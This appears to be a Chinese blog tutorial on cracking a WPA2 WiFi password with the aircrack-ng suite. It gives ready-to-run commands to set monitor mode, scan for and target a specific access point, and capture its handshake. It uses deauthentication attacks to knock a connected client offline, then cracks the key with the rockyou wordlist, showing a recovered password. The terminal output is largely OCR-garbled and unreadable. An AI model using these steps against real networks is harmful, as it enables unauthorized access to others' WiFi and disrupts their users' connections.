暴力破解WiFi密码

1.将无线网卡设置成monitor模式 airmon-ng start wlan0

关闭可影响实验的因素 airmon-ng check kill

2.运行airodump-ng wlan0扫描附近网段

12 
ass ID 
21 
Elapsed: 
• 84 
48 s 
PAR 
-51 
-52 
-56 
-56 
2818-87-24 17:57 
Beacons 
#Data , s 
11 
Rate 
27B 
27B 
13B 
13B 
13b 
Lost 
ENC 
"PA2 
"PA2 
"PA2 
"PA2 
"PA2 
WPA 
CIPHER AUTH ESSID 
DC 
ass ID 
ccNP 
ccNP 
ccNP 
ccNP 
ccNP 
F rmes 
PSK 
PSK 
P SK 
PSK 
P robe 
2.4Gntg 
CNCC-4wd5 
dLink 
cycc-yeFU 
< Length: 
STATION 
48. 
PAR 
-13

BSSID wifi设备的mac地址

PWR 信号强度

Beacons 数据的速率

#Data 捕获的数据分组数量

#/S 十秒内的捕获数据分组数量

CH 信道号

MB 数据传输速率

ENC 加密类型

CIPHER 加密算法

AUTH 加密协议

ESSID WiFi名称

3.确定好要破解的网络(以2.4G网络(备·)为例) 执行下面的命令

airodump-ng wlan0 --bssid F4:6A:92:2E:E8:B4 -c 1 -w pj/01

注释:-c为指定信道 -w为文件存放位置并起一个名

 

CH 1] [ 
BSSID 
BSSID 
: 92. 
78: 02 : 
48:E2 
-oot@kali : —/pj# 
Elapsed 
24 s 
PWR 
] [ 2018-07-24 
RX Q 
3 
Beacons 
241 
20:18 ] [ 
Data, 
55 
WPA 
2 
STATION 
handshake: 
CH MB 
1 270 
Lost 
PWR 
-16 
-17 
Rate 
le-24e 
ENC CIPHER AUTH ESSID 
PSK 
WPA2 CCMP 
Frames Probe 
15 
34

 

出现红框内内容表示已抓取到握手包 准备破解密码

如果抓不到握手包 可以发动攻击使一个已连接的用户掉线 使其重新认证连接 我们就此机会抓取握手包

aireplay-ng -0 10 -a F4:6A:92:2E:E8:B4 -c 78:02:F8:F1:8E:CD wlan0

rootCKaL1 
21:22. 
21:22. 
21:22. 
21:22. 
21:22. 
21:22. 
alreplay-ng -G) 10 -a F4:6A• 
21. 
21. 
21. 
121. 
21. 
.22. 
.22. 
.22. 
.22. 
root@kali . 
•36 
•36 
•37 
•38 
•38 
• 40 
•41 
•41 
•42 
•43 
Waiting 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
for beacon frame (BSSID: 
64 
64 
64 
64 
64 
64 
64 
64 
64 
64 
directed 
directed 
directed 
directed 
directed 
directed 
directed 
directed 
directed 
directed 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
(code 
(code 
(code 
(code 
(code 
(code 
(code 
(code 
(code 
(code 
7). 
7). 
7). 
7). 
7). 
7). 
7). 
7). 
7). 
7). 
STMAC 
STMAC 
STMAC 
STMAC 
STMAC 
STMAC 
STMAC 
STMAC 
STMAC 
STMAC 
•84) on channel 1 
[78. 
[78. 
[78. 
[78. 
[78. 
[78. 
[78. 
[78. 
[78. 
[78. 
wlan@ 
5164 
2163 
3163 
9165 
2165 
2163 
5163 
2163 
3162 
3163 
ACKs] 
ACKs] 
ACKs] 
ACKs] 
ACKs] 
ACKs] 
ACKs] 
ACKs] 
ACKs] 
ACKs]

注释:攻击模式为0 攻击10次 攻击次数调为0为无限攻击 -a为AP端mac地址 -c为客户端mac地址 wlan0为无线网卡的名字

 

附介绍几种攻击模式

Attack 0: Deauthentication 解除认证

Attack 1: Fake authentication 伪造身份验证

Attack 2: Interactive packet replay 交互式数据包重播

Attack 3: ARP request replay attack ARP请求重播攻击

Attack 4: KoreK chopchop attack KoreK斩杀攻击

Attack 5: Fragmentation attack 碎片攻击

Attack 6: Cafe-latte attack 咖啡拿铁攻击

Attack 7: Client-oriented fragmentation attack 面向客户的分片攻击

Attack 8: WPA Migration Mode WPA迁移模式

Attack 9: Injection test 注射试验

4.ls 01*查看抓到包 选择cap格式

Is 01* 
cap 01-01. csv @1-@1.kismet . csv @1-@1.kismet . netxml 
root@kali : —/pj#

 

使用字典暴力破解

aircrack-ng -w /usr/share/wordlists/rockyou.txt 01-02.cap

Aircrack-ng 1. 
(928.68 k/s) 
2 
5/4 keys tested 
@ seconds 
Time left: 
Master Key 
125 . 
KEY FOUND! 
[ 15331301 ] 
42 
. 46 
62 
30 
17 
63 
24 
8B 
61 
5B 
85 
75 
44 
72 
cc 
85 
41 
86 
86 
Al 
71 
44 
51 
84 
13 
88 
22 
41 
16 
56 
10 
AF 60 
Transient Key 
EAPOL HMAC 
root@kali : —/pj# 
79 
33 
42 
52 
89 
39 
AC 
3D 
07 
84 
88 
66 
62 
36 
31 
BC 
DC 
IA 
12 
56 
07 
AE 
12 
32 
28 
35 
52 
95 
2B 
84 
BE 
04 
ED

破解成功 密码为15331301

相关链接 https://blog.csdn.net/tonyzhejiang/article/details/72152512

https://blog.csdn.net/xinyuan510214/article/details/50395076

 

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注